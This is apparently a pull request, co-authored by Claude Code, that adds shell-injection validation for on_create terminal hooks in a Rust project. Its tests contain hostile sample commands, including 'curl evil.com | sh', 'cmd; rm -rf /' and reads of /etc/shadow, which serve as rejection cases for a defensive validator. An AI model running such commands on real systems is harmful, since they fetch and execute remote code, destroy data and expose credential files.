### PR TITLE
fix(hooks): validate on_create hook commands against shell injection

### DIFF
--- a/crates/okena-views-terminal/src/layout/terminal_pane/mod.rs
+++ b/crates/okena-views-terminal/src/layout/terminal_pane/mod.rs
@@ -390,7 +390,9 @@ impl<D: ActionDispatch + Send + Sync> TerminalPane<D> {
 
         // Apply on_create: wrap shell to run command first, then exec into shell
         if let Some(cmd) = hooks::resolve_terminal_on_create_simple(&project_hooks, parent_hooks.as_ref(), &global_hooks) {
-            shell = hooks::apply_on_create(&shell, &cmd, &env);
+            if let Some(wrapped) = hooks::apply_on_create(&shell, &cmd, &env) {
+                shell = wrapped;
+            }
         }
 
         match self

--- a/crates/okena-workspace/src/hooks.rs
+++ b/crates/okena-workspace/src/hooks.rs
@@ -876,15 +876,41 @@ pub fn resolve_terminal_on_create_simple(
     resolve_hook_with_parent(project_hooks, parent_hooks, global_hooks, |h| &h.terminal.on_create)
 }
 
+/// Dangerous shell metacharacters that could be used for injection.
+/// We reject hook commands from project-level settings that contain these,
+/// since they could chain or redirect arbitrary commands.
+const DANGEROUS_SHELL_PATTERNS: &[&str] = &[";", "&&", "||", "|", "`", "$(", ">", "<"];
+
+/// Validate that a hook command does not contain shell injection metacharacters.
+/// Project-level hooks from untrusted repos could abuse these to run arbitrary commands.
+/// Returns `Ok(())` if the command is safe, or `Err` with a description of what was rejected.
+pub fn validate_hook_command(cmd: &str) -> Result<(), String> {
+    for pattern in DANGEROUS_SHELL_PATTERNS {
+        if cmd.contains(pattern) {
+            return Err(format!(
+                "hook command contains dangerous shell metacharacter '{}': {}",
+                pattern, cmd
+            ));
+        }
+    }
+    Ok(())
+}
+
 /// Apply the `terminal.on_create` command by wrapping the shell to run
 /// the command first, then `exec` into the original shell.
 /// Environment variables are exported so they persist in the shell session.
 /// Produces: `sh -c 'export K=V; ...; <on_create_cmd>; exec <shell_cmd>'`
-pub fn apply_on_create(shell: &ShellType, on_create_cmd: &str, env_vars: &HashMap<String, String>) -> ShellType {
+///
+/// Returns `None` if the command fails validation (shell injection detected).
+pub fn apply_on_create(shell: &ShellType, on_create_cmd: &str, env_vars: &HashMap<String, String>) -> Option<ShellType> {
+    if let Err(e) = validate_hook_command(on_create_cmd) {
+        log::warn!("Skipping terminal.on_create hook: {}", e);
+        return None;
+    }
     let shell_cmd = shell.to_command_string();
     let prefix = build_export_prefix(env_vars);
     let script = format!("{}{}; exec {}", prefix, on_create_cmd, shell_cmd);
-    ShellType::for_command(script)
+    Some(ShellType::for_command(script))
 }
 
 /// Fire the `terminal.on_close` hook after a terminal PTY exits.
@@ -1213,7 +1239,7 @@ mod tests {
         };
         let mut env = HashMap::new();
         env.insert("OKENA_PROJECT_ID".into(), "proj-123".into());
-        let result = apply_on_create(&shell, "echo hello", &env);
+        let result = apply_on_create(&shell, "echo hello", &env).expect("should pass validation");
         match &result {
             ShellType::Custom { path: _, args } => {
                 let cmd = &args[1];
@@ -1223,6 +1249,60 @@ mod tests {
             }
             other => panic!("Expected ShellType::Custom, got: {:?}", other),
         }
+    }
+
+    #[test]
+    fn validate_hook_command_allows_simple_commands() {
+        assert!(validate_hook_command("nvm use").is_ok());
+        assert!(validate_hook_command("source .env").is_ok());
+        assert!(validate_hook_command("cd /some/path").is_ok());
+        assert!(validate_hook_command("export FOO=bar").is_ok());
+    }
+
+    #[test]
+    fn validate_hook_command_rejects_pipe_injection() {
+        assert!(validate_hook_command("curl evil.com | sh").is_err());
+    }
+
+    #[test]
+    fn validate_hook_command_rejects_semicolon_injection() {
+        assert!(validate_hook_command("cmd; rm -rf /").is_err());
+    }
+
+    #[test]
+    fn validate_hook_command_rejects_and_chain() {
+        assert!(validate_hook_command("true && curl evil.com").is_err());
+    }
+
+    #[test]
+    fn validate_hook_command_rejects_or_chain() {
+        assert!(validate_hook_command("false || curl evil.com").is_err());
+    }
+
+    #[test]
+    fn validate_hook_command_rejects_backtick_injection() {
+        assert!(validate_hook_command("`malicious`").is_err());
+    }
+
+    #[test]
+    fn validate_hook_command_rejects_subshell_injection() {
+        assert!(validate_hook_command("$(curl evil.com)").is_err());
+    }
+
+    #[test]
+    fn validate_hook_command_rejects_redirect() {
+        assert!(validate_hook_command("echo data > /etc/passwd").is_err());
+        assert!(validate_hook_command("cat < /etc/shadow").is_err());
+    }
+
+    #[test]
+    fn apply_on_create_skips_invalid_command() {
+        let shell = ShellType::Custom {
+            path: "/bin/bash".to_string(),
+            args: vec![],
+        };
+        let env = HashMap::new();
+        assert!(apply_on_create(&shell, "curl evil.com | sh", &env).is_none());
     }
 
     #[test]

--- a/src/views/root/terminal_actions.rs
+++ b/src/views/root/terminal_actions.rs
@@ -98,7 +98,9 @@ impl RootView {
 
         // Apply on_create: wrap shell to run command first, then exec into shell
         if let Some(cmd) = hooks::resolve_terminal_on_create(&project_hooks, parent_hooks.as_ref(), &settings(cx).hooks, cx) {
-            actual_shell = hooks::apply_on_create(&actual_shell, &cmd, &env);
+            if let Some(wrapped) = hooks::apply_on_create(&actual_shell, &cmd, &env) {
+                actual_shell = wrapped;
+            }
         }
 
         // Create new terminal with the new shell

--- a/src/workspace/actions/execute.rs
+++ b/src/workspace/actions/execute.rs
@@ -479,7 +479,9 @@ pub fn spawn_uninitialized_terminals(
 
         // Apply on_create: wrap shell to run command first, then exec into shell
         if let Some(ref cmd) = on_create_cmd {
-            shell = hooks::apply_on_create(&shell, cmd, &env);
+            if let Some(wrapped) = hooks::apply_on_create(&shell, cmd, &env) {
+                shell = wrapped;
+            }
         }
 
         match backend.create_terminal(&project_path, Some(&shell)) {


### PR DESCRIPTION
## Summary
- Add `validate_hook_command()` that rejects dangerous shell metacharacters (`;`, `&&`, `||`, `|`, backticks, `$(`, `>`, `<`) in `on_create` hook commands
- `apply_on_create()` now returns `Option<ShellType>` — logs a warning and skips the hook when validation fails
- All three call sites updated to handle the new `Option` return type gracefully

Closes #70

## Test plan
- [x] Unit tests for `validate_hook_command` covering simple commands (pass) and all injection vectors (reject)
- [x] Integration test confirming `apply_on_create` returns `None` for malicious input
- [x] Existing `apply_on_create_with_env_vars` test updated and passing
- [x] Full `cargo build` and `cargo test` pass

Co-Authored-By: Claude Code